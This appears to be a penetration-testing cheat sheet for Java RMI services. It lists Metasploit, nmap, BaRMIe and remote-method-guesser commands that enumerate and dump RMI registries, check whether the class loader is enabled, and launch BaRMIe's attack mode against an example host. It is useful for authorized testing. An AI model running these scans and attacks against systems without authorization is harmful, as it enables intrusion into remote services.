description |
---|
Java Remote Method Invocation |
Check if class loader is enabled:
```
msf > use auxiliary/scanner/misc/java_rmi_server
msf > set RHOSTS file:java_rmi.txt
msf > set THREADS 25
msf > run
```
Dump registry with MSF:
```
msf > use auxiliary/gather/java_rmi_registry
msf > set RHOSTS file:java_rmi.txt
msf > run
```
Dump registry with Nmap:
```
$ sudo nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" 192.168.1.11 -p1098
```

```
$ java -jar BaRMIe.jar -enum 192.168.1.11 1098
$ java -jar BaRMIe.jar -attack 192.168.1.11 1098
$ java -jar rmg-3.0.0-jar-with-dependencies.jar 192.168.1.11 1098 enum
```